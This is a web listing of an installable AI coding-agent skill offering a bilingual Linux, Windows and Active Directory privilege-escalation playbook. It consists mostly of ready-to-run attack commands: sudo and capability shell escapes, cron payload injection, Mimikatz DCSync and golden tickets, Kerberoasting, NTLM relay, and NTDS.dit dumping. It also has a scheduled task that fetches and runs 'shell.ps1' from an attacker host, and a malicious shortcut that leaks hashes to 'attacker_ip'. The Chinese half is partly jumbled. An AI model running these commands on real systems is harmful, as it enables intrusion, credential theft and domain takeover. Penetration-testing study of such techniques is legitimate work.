权限提升方法详解：Linux与Windows系统提权技术、工具与实战指南

Privilege Escalation Methods by zebbern/claude-code-guide

3,700 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/zebbern/claude-code-guide --skill 'Privilege Escalation Methods'

系统架构测试安全

🇨🇳中文介绍

权限提升方法

目的

提供从低权限用户提升到 root/管理员权限的全面技术，适用于已攻陷的 Linux 和 Windows 系统。对于渗透测试的后渗透阶段和红队操作至关重要。

输入/前提条件

在目标系统上具有初始的低权限 shell 访问权限
Kali Linux 或渗透测试发行版
工具：Mimikatz、PowerView、PowerUpSQL、Responder、Impacket、Rubeus
理解 Windows/Linux 权限模型
对于 AD 攻击：域用户凭据和对域控制器的网络访问权限

输出/交付成果

Root 或 Administrator shell 访问权限
提取的凭据和哈希值
持久化访问机制
域沦陷（针对 AD 环境）

核心技术

Linux 权限提升

1. 滥用 Sudo 二进制文件

利用 GTFOBins 技术利用配置错误的 sudo 权限：

# 检查 sudo 权限
sudo -l

# 利用常见二进制文件
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts    # 然后输入：!bash
sudo man man            # 然后输入：!bash
sudo env /bin/bash

2. 滥用计划任务 (Cron)

# 查找可写的 cron 脚本
ls -la /etc/cron*
cat /etc/crontab

# 向可写脚本注入载荷
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh

# 等待执行，然后：
/bin/bash -p

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

Windows 权限提升

# 使用 SweetPotato (SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe

# 使用 SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

# 使用 PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

3. 滥用 SeBackupPrivilege

import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

4. 滥用 SeLoadDriverPrivilege

# 加载易受攻击的 Capcom 驱动程序
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe

.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
  --Author DOMAIN\<USER> --Command "cmd.exe" `
  --Arguments "/c net user Administrator Password!@# /domain" `
  --GPOName "ADDITIONAL DC CONFIGURATION"

Active Directory 攻击

# 使用 Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request

# 使用 CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt

.\Rubeus.exe asreproast

# 通过 DCSync 获取 krbtgt 哈希
mimikatz# lsadump::dcsync /user:krbtgt

# 创建黄金票据
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500

.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
klist  # 验证票据

5. 结合计划任务的黄金票据

# 1. 提权并转储凭据
mimikatz# token::elevate
mimikatz# vault::cred /patch
mimikatz# lsadump::lsa /patch

# 2. 创建黄金票据
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi

# 3. 创建计划任务
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
  /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
schtasks /run /s DOMAIN /TN "enterprise"

# 启动 Responder
responder -I eth1 -v

# 创建恶意快捷方式 (Book.url)
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico

responder -I eth1 -v
ntlmrelayx.py -tf targets.txt -smb2support

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

技术	操作系统	需要域环境	工具
Sudo 二进制文件滥用	Linux	否	GTFOBins
Cron 任务利用	Linux	否	手动
Capability 滥用	Linux	否	getcap
NFS no_root_squash	Linux	否	mount
令牌模拟	Windows	否	SweetPotato
服务滥用	Windows	否	PowerUp
Kerberoasting	Windows	是	Rubeus/Impacket
AS-REP Roasting	Windows	是	Rubeus
黄金票据	Windows	是	Mimikatz
票据传递	Windows	是	Rubeus
DCSync	Windows	是	Mimikatz
LLMNR 投毒	Windows	是	Responder

在尝试提权前拥有初始 shell 访问权限
在选择技术前验证目标操作系统和环境
针对域环境与本地提权使用合适的工具

未经授权在生产系统上尝试技术
未经客户批准留下持久化机制
忽略检测机制 (EDR, SIEM)

在利用前进行彻底枚举
记录所有成功的提权路径
在任务结束后清理痕迹

示例 1: Linux Sudo 提权至 Root

# 检查 sudo 权限
$ sudo -l
User www-data may run the following commands:
    (root) NOPASSWD: /usr/bin/vim

# 利用 vim
$ sudo vim -c ':!/bin/bash'
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)

示例 2: Windows Kerberoasting

# 请求服务票据
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# 使用 hashcat 破解
$ hashcat -m 13100 hashes.txt rockyou.txt

问题	解决方案
sudo -l 需要密码	尝试其他枚举方法 (SUID, cron, capabilities)
Mimikatz 被 AV 阻止	使用 Invoke-Mimikatz 或 SafetyKatz
Kerberoasting 未返回哈希	检查具有 SPN 的服务账户
令牌模拟失败	验证 SeImpersonatePrivilege 是否存在
NFS 挂载失败	检查 NFS 版本兼容性 (vers=2,3,4)

如需详细的枚举脚本，请使用：

LinPEAS : Linux 权限提升枚举
WinPEAS : Windows 权限提升枚举
BloodHound : Active Directory 攻击路径映射
GTFOBins : Unix 二进制文件利用参考

🇺🇸English

Privilege Escalation Methods

Purpose

Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.

Inputs/Prerequisites

Initial low-privilege shell access on target system
Kali Linux or penetration testing distribution
Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
Understanding of Windows/Linux privilege models
For AD attacks: Domain user credentials and network access to DC

Outputs/Deliverables

Root or Administrator shell access
Extracted credentials and hashes
Persistent access mechanisms
Domain compromise (for AD environments)

Core Techniques

Linux Privilege Escalation

1. Abusing Sudo Binaries

Exploit misconfigured sudo permissions using GTFOBins techniques:

# Check sudo permissions
sudo -l

# Exploit common binaries
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts    # then type: !bash
sudo man man            # then type: !bash
sudo env /bin/bash

2. Abusing Scheduled Tasks (Cron)

# Find writable cron scripts
ls -la /etc/cron*
cat /etc/crontab

# Inject payload into writable script
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh

# Wait for execution, then:
/bin/bash -p

3. Abusing Capabilities

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Python with cap_setuid
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Perl with cap_setuid
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

# Tar with cap_dac_read_search (read any file)
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar

4. NFS Root Squashing

# Check for NFS shares
showmount -e <victim_ip>

# Mount and exploit no_root_squash
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash

5. MySQL Running as Root

# If MySQL runs as root
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p

Windows Privilege Escalation

1. Token Impersonation

# Using SweetPotato (SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe

# Using SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

2. Service Abuse

# Using PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

3. Abusing SeBackupPrivilege

import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

4. Abusing SeLoadDriverPrivilege

# Load vulnerable Capcom driver
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe

5. Abusing GPO

.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
  --Author DOMAIN\<USER> --Command "cmd.exe" `
  --Arguments "/c net user Administrator Password!@# /domain" `
  --GPOName "ADDITIONAL DC CONFIGURATION"

Active Directory Attacks

1. Kerberoasting

# Using Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request

# Using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt

2. AS-REP Roasting

.\Rubeus.exe asreproast

3. Golden Ticket

# DCSync to get krbtgt hash
mimikatz# lsadump::dcsync /user:krbtgt

# Create golden ticket
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500

4. Pass-the-Ticket

.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
klist  # Verify ticket

5. Golden Ticket with Scheduled Tasks

# 1. Elevate and dump credentials
mimikatz# token::elevate
mimikatz# vault::cred /patch
mimikatz# lsadump::lsa /patch

# 2. Create golden ticket
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi

# 3. Create scheduled task
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
  /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
schtasks /run /s DOMAIN /TN "enterprise"

Credential Harvesting

LLMNR Poisoning

# Start Responder
responder -I eth1 -v

# Create malicious shortcut (Book.url)
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico

NTLM Relay

responder -I eth1 -v
ntlmrelayx.py -tf targets.txt -smb2support

Dumping with VSS

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

Quick Reference

Technique	OS	Domain Required	Tool
Sudo Binary Abuse	Linux	No	GTFOBins
Cron Job Exploit	Linux	No	Manual
Capability Abuse	Linux	No	getcap
NFS no_root_squash	Linux	No	mount
Token Impersonation	Windows	No	SweetPotato
Service Abuse	Windows	No	PowerUp
Kerberoasting	Windows	Yes	Rubeus/Impacket
AS-REP Roasting

Constraints

Must:

Have initial shell access before attempting escalation
Verify target OS and environment before selecting technique
Use appropriate tool for domain vs local escalation

Must Not:

Attempt techniques on production systems without authorization
Leave persistence mechanisms without client approval
Ignore detection mechanisms (EDR, SIEM)

Should:

Enumerate thoroughly before exploitation
Document all successful escalation paths
Clean up artifacts after engagement

Examples

Example 1: Linux Sudo to Root

# Check sudo permissions
$ sudo -l
User www-data may run the following commands:
    (root) NOPASSWD: /usr/bin/vim

# Exploit vim
$ sudo vim -c ':!/bin/bash'
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)

Example 2: Windows Kerberoasting

# Request service tickets
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# Crack with hashcat
$ hashcat -m 13100 hashes.txt rockyou.txt

Troubleshooting

Issue	Solution
sudo -l requires password	Try other enumeration (SUID, cron, capabilities)
Mimikatz blocked by AV	Use Invoke-Mimikatz or SafetyKatz
Kerberoasting returns no hashes	Check for service accounts with SPNs
Token impersonation fails	Verify SeImpersonatePrivilege is present
NFS mount fails	Check NFS version compatibility (vers=2,3,4)

Additional Resources

For detailed enumeration scripts, use:

LinPEAS : Linux privilege escalation enumeration
WinPEAS : Windows privilege escalation enumeration
BloodHound : Active Directory attack path mapping
GTFOBins : Unix binary exploitation reference

Weekly Installs

–

Repository

zebbern/claude-…de-guide

GitHub Stars

3.7K

First Seen

–

Security Audits

Gen Agent Trust HubWarn SocketFail SnykFail

xdrop 文件传输脚本：Bun 环境下安全上传下载工具，支持加密分享

28,800 周安装

权限提升方法详解：Linux与Windows系统提权技术、工具与实战指南

🇨🇳中文介绍

权限提升方法

目的

输入/前提条件

输出/交付成果

核心技术

Linux 权限提升

1. 滥用 Sudo 二进制文件

2. 滥用计划任务 (Cron)

相关 Skills

3. 滥用能力 (Capabilities)

4. NFS Root Squashing 漏洞利用

5. MySQL 以 Root 身份运行

Windows 权限提升

1. 令牌模拟

2. 服务滥用

3. 滥用 SeBackupPrivilege

4. 滥用 SeLoadDriverPrivilege

5. 滥用 GPO

Active Directory 攻击

1. Kerberoasting

2. AS-REP Roasting

3. 黄金票据

4. 票据传递

5. 结合计划任务的黄金票据

凭据收集

LLMNR 投毒

NTLM 中继

使用 VSS 转储

快速参考

约束

示例

示例 1: Linux Sudo 提权至 Root

示例 2: Windows Kerberoasting

故障排除

额外资源

🇺🇸English

Privilege Escalation Methods

Purpose

Inputs/Prerequisites

Outputs/Deliverables

Core Techniques

Linux Privilege Escalation

1. Abusing Sudo Binaries

2. Abusing Scheduled Tasks (Cron)

3. Abusing Capabilities

4. NFS Root Squashing

5. MySQL Running as Root

Windows Privilege Escalation

1. Token Impersonation

2. Service Abuse

3. Abusing SeBackupPrivilege

4. Abusing SeLoadDriverPrivilege

5. Abusing GPO

Active Directory Attacks

1. Kerberoasting

2. AS-REP Roasting

3. Golden Ticket

4. Pass-the-Ticket

5. Golden Ticket with Scheduled Tasks

Credential Harvesting

LLMNR Poisoning

NTLM Relay

Dumping with VSS

Quick Reference

Constraints

Examples

Example 1: Linux Sudo to Root

Example 2: Windows Kerberoasting

Troubleshooting

Additional Resources

最新 Skills